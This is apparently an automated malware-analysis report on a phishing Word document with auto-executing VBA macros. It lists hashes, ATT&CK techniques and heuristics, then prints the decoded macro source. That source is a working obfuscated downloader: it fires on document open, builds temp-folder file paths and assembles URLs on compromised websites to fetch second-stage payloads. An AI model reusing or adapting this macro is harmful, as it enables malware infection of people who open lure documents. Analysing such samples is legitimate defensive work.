Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 54047e6692e3ab22…

Verdict: MALICIOUS
File type: Office (OLE)
Size: 119.0 KB
Created: 2015-07-27 20:08:00
Authoring application: Microsoft Office Word
First seen: 2018-10-07
MD5: 0e2d65241d6e4c68aba332be4f8e010b
SHA-1: a5651a9b9829dc271734c3c1974356ebd3c2c342
SHA-256: 54047e6692e3ab2282a2216d3d07abe7e29bfe4d25d23577994ff6c4c39841f4
Risk score: 230

Malware Insights

MITRE ATT&CK
  • T1566.001 Spearphishing Attachment
  • T1059.005 Visual Basic
  • T1140 Deobfuscate/Decode Files or Information
  • T1204.002 Malicious File

The document contains multiple auto-executing VBA macros (AutoOpen, Auto_Open, Workbook_Open) that run as soon as the document is opened. The VBA script uses `CreateObject` to instantiate `MSXML2.ServerXMLHTTP` and attempts to download content from a URL, most likely to fetch a second-stage payload. The `Environ()` function is also called, suggesting that it gathers information about the local system. The document body presents a fake renewal notice to lure the user into enabling macros.

Heuristics (9)

  • VBA macros detected (medium, OLE_VBA_MACROS, 5 related findings)
    Document contains VBA macro code
  • AutoOpen macro (high, OLE_VBA_AUTOOPEN)
  • Workbook_Open macro (high, OLE_VBA_WBOPEN)
  • Auto_Open macro (high, OLE_VBA_AUTO)
  • CreateObject call (high, OLE_VBA_CREATEOBJ)
  • Environ() call, environment variable access (low, OLE_VBA_ENVIRON)
  • Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC)
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Macro/content-enable lure (medium, SE_ENABLE_LURE)
    Document instructs the user to enable macros or editing, a common technique used by malware droppers to bypass Office macro security settings
  • Embedded URL (info, EMBEDDED_URL)
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL | Channel
    • http://ns.adobe.com/xap/1.0/ | In document text (OLE body)
    • http://www.w3.org/1999/02/22-rdf-syntax-ns# | In document text (OLE body)
    • http://ns.adobe.com/exif/1.0/ | In document text (OLE body)
    • http://ns.adobe.com/tiff/1.0/ | In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/mm/ | In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef# | In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent# | In document text (OLE body)
    • http://purl.org/dc/elements/1.1/ | In document text (OLE body)
    • http://ns.adobe.com/photoshop/1.0/ | In document text (OLE body)
    • http://ns.adobe.com/xap/1.0/rights/ | In document text (OLE body)
    • http://www.iec.ch | In document text (OLE body)
    • http://schemas.openxmlformats.org/drawingml/2006/main | In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliography | In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml | In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 9642 bytes
SHA-256: 2c0dd138f03a927d190a030b45f10307652a43262edac8d5b59ba05777099734
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "Module1"
Public Function Xjdkhjfwefw(a As Object)
Xjdkhjfwefw = (a.responseText)
End Function
Attribute VB_Name = "Module2"
 
Public Function Goabc(sps As String)
BHJQVDQWVSS = "g21he 2g1hcf1c12e"
BHJQVDQWVSS = "g21he 2g1hcf1c12e"
BHJQVDQWVSS = "g21he 2g1hcf1c12e"
Goabc = Environ(sps)
End Function
Public Function Linolium(nbqjbdjqw As String)
Dim dhjqwqkjww As Integer, aaqjwhdq As Integer, VjwiqdhqkwjHJhjkahsdjsakDD As Object, AHUDWQI As String
Dim ashdUHhda As String, hausd As Integer, JQHWDJQWB As String
ashdUHhda = nbqjbdjqw
hausd = Tan(11) + 225
'asdsad
JQHWDJQWB = "E"
JQHWDJQWB = "G" + JQHWDJQWB + Chr(88 + 4 * hausd)
BQDHJQWDGWQJGS = "MS" + Chr(93 + 5 * hausd) + "ML2.ServerXMLH" & Chr(85 + hausd) & Chr(84) & Chr(80)
'Hukqjdhjksahd
Set VjwiqdhqkwjHJhjkahsdjsakDD = CreateObject(BQDHJQWDGWQJGS)
VjwiqdhqkwjHJhjkahsdjsakDD.Open JQHWDJQWB, ashdUHhda
VjwiqdhqkwjHJhjkahsdjsakDD.Send (AHUDWQI)
Linolium = Module1.Xjdkhjfwefw(VjwiqdhqkwjHJhjkahsdjsakDD)
End Function
Sub Crispy(NumOfSeconds As Long)
Dim SngSec As Long
SngSec = Timer + NumOfSeconds
Do While Timer < SngSec
DoEvents
Loop
End Sub
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

 Sub Mjqwdkklq_Open()
     
End Sub
Sub Ajdqljwd_Open()
     
End Sub
Sub Auto_Open()
    Unjqwkdqwh
End Sub
Sub Unjqwkdqwh()
    BQJDQW = "1j2hejk ghj21ge 21"
    Sqjdklasdsj
End Sub
Sub Giqjwdhqwkjq()
    NBJQJWD = "hje 12"
End Sub
Sub AutoOpen()
    NJQWDQ = "12jhe 12g"
    Unjqwkdqwh
End Sub

Sub Workbook_Open()
    VQDWQ = "1b2hjeg"
    Auto_Open
End Sub
 
Sub Sqjdklasdsj()

    
    Dim fallout As Integer, silkroad As Integer, inclife As Integer
    Dim hnquhdjincinc As Integer
    Dim retVal As Variant, gana As Integer, incturakk As Integer, kaladd As Integer, BWBBNS As String, KOLYHDN As String
    KOLYHDN = Chr(90 + 2)
    
    
    ANGOLA = Ubqhwdhwqbd(13221) + ""
    BWBBNS = Chr(60 + 24) & "emp"
    QHDQUWH = ANGOLA
    FL2 = QHDQUWH
    PH2 = Module2.Goabc(BWBBNS) + KOLYHDN
    
    silkroad = 9
    jwnqdw = -1
    
    BOSNIA = 8719723
    BOSNIA = 1 + 1 + 113 + Sgn(jwnqdw)
    BALAGAN = BOSNIA
    

    JWIDJIAAA = ""
    QIWJDABB = "b"
    HUYFEA = QIWJDABB + "a" + Chr(116)
    PSFL = FL2 + Chr(40 + 6) + "ps1"
    
    gana = TRnqjdkqSjsadSS(1 - 300 * Sin(20))
    SSS = Chr(BALAGAN + 2 + gana)
    VBFL = FL2 + Chr(50 - 4) + "v" & Chr(90 + 8) & "" & SSS & ""
    BAFL = FL2 + Chr(TRnqjdkqSjsadSS(Fix(-22.043)) + 31 - 10 + 25 + gana + 2) + HUYFEA
    
    INTG = "" & "o" & "bject"
    KIWD = Chr(10 + 100 + TRnqjdkqSjsadSS(CInt(Len(BAFL)))) + "dul" & "e"
    AFTG = Chr(109) & KIWD
    
    SXEE = ""
    SXAA = ""
    SXE = SXEE & SXAA & "" & ""
    GNG = ".j" & "pg"
    SXE = ".exe"
    
    
    HUQD = Chr(30 + 16 + 1)
    ATTH = "http" + "://"
    BQHJDQ = "s" + "avep" + "ic" & Chr(46) & "s" & "u" + HUQD
     
    PSPTH = PH2 + PSFL
    VBPTH = PH2 + VBFL
    BAPTH = "jb2e j12hej12ge 21"
    ABPTH = PH2 + BAFL
    BAPTH = ABPTH
    JHQKWDQAASS = BQHJDQ
    
    Dim BALAGANHUQW As Integer, DRT As Integer, BFT As Integer, CFT As Integer, DFT As Integer, EFT As Integer, CONT As String
    
    DRT = 315
    BFT = 316
    CFT = 317
    DFT = 318
    EFT = 319
    Dim NUWDHUQHUQWDH As String
    NUWDHUQHUQWDH = "" + "USE" & "RPROFILE"
    Dim PBIn As String, asdwq As String, MIWDWQ As String
    
   
    
    TSTS = "." + "tx" + "t"
    CDDD = "78672738612836" + TSTS
    LNSS = "f" & "a" & "f" & "a" & "" + TSTS
    STT1 = "bvautumnc" + "olorrun.com/w" + "p-conte" + "nt/the" + "mes/min" + "amaze/li" + "b/exte" + "ntions/pret" + "tyPho" + "to/im" + "ages/"
    STT2 = "iberianfurniturerental.com/w" + "p-con" + "tent/plug" + "ins/next" + "gen-gal" + "lery/ad" + "min/js/Jc" + 
... (truncated)